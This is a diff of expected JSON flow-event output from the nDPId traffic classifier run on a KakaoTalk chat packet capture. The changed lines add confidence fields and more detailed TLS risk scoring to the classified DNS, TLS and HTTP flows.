+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00621{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00748{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00600{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
